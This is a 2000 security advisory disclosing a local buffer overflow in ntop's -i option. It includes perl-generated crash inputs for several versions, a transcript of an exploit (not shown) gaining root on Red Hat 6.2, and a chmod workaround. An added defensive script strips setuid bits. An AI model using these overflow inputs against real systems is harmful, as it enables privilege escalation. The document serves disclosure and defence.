
Title: ntop local buffer overflow vulnerability
Released by: Christophe Bailleux
Date: 24th October 2000
Subject : ntop local buffer overflow vulnerability

Author  : Christophe BAILLEUX (cb@grolier.fr)

Platforms : *nix

Tested versions : ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2







I.      Problem



All ntop versions are vulnerable to a local buffer overflow attack in their
-i option.

ntop must be owned by root with the setuid bit set for the attacker to gain
root privileges.







II.     Demo





a) ntop 1.1





tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`

ntop v.1.1 MT [i686-pc-linux-gnu] listening on

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP

Segmentation fault

tshaw:/home/cb/SRCAUDIT/ntop-1.1$





b) ntop 1.2a7



tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`

Segmentation fault

tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$







c) ntop 1.3.1





tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`

Segmentation fault

tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$





d) ntop 1.3.2



tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`



24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00

07:04:32 PM build)

24/Oct/2000:12:32:16 Listening on

[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]

24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri 

24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/

24/Oct/2000:12:32:16 Initialising...

Segmentation fault

tshaw:/home/cb/ntop-1.3.2$









III.    Workaround



chmod ug-s path/to/ntop



The ntop team has been informed (http://www.ntop.org).
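
The workaround above applied across a directory tree, as an added example that is not part of the original advisory: it finds files named ntop that carry the setuid or setgid bit and strips both bits, then re-checks. The function names, the search root and the APPLY variable are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the advisory): audit and apply "chmod ug-s".
# ROOT, NAME and APPLY are hypothetical names chosen for this script.

# Print regular files called NAME under ROOT with the setuid or setgid bit.
# Extra arguments are passed to find as actions (replacing the default print).
find_setid() {
    root=$1; name=$2; shift 2
    find "$root" -xdev -type f -name "$name" \
        \( -perm -4000 -o -perm -2000 \) "$@" 2>/dev/null
}

# Number of matching files (0 when the tree is clean).
count_setid() {
    echo $(( $(find_setid "$1" "$2" | wc -l) ))
}

# Log each match, remove both bits, and succeed only if none remain.
strip_setid() {
    find_setid "$1" "$2" -exec ls -l {} \; -exec chmod ug-s {} \;
    [ "$(count_setid "$1" "$2")" -eq 0 ]
}

# Direct use: script ROOT [NAME]. Reports only, unless APPLY=1 is set.
if [ $# -ge 1 ]; then
    target=${2:-ntop}
    echo "setuid/setgid copies of $target under $1: $(count_setid "$1" "$target")"
    find_setid "$1" "$target"
    if [ "${APPLY:-0}" = "1" ]; then
        strip_setid "$1" "$target" || echo "some files still carry the bits" >&2
    fi
fi
```

Run it once without APPLY to review the list, then with APPLY=1 as root to apply the change; a package reinstall or upgrade can restore the bits, so the check is worth repeating.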













IV.     Exploit (See Attachment)





Tested on Red Hat 6.2 (Zoot), where ntop is installed by default with the
setuid root bit set.





[cb@nux cb]$ cat /etc/redhat-release

Red Hat Linux release 6.2 (Zoot)

[cb@nux cb]$ rpm -qf /sbin/ntop

ntop-1.1-1

[cb@nux cb]$ id

uid=535(cb) gid=535(cb) groups=535(cb)

[cb@nux cb]$ ./expl



ntop v.1.1 MT [i586-pc-linux-gnu] listening on

..............................



Host        Act   -Rcvd-      Sent    TCP   UDP ICMP

bash#

bash# id

uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)

bash# exit

[cb@nux cb]$







Greetings to kalou, Bdev, cleb, dv, PullthePlug Community and all I
forget.

Thanks Teuk for letting me use his server to make and test the ntop redhat
6.2 exploit :)



Regards,





--

BAILLEUX Christophe - Network & System Security Engineer

Grolier Interactive Europe-OG/CS

Voice:+33-(0)1-5545-4789 - mailto:cb@grolier.fr







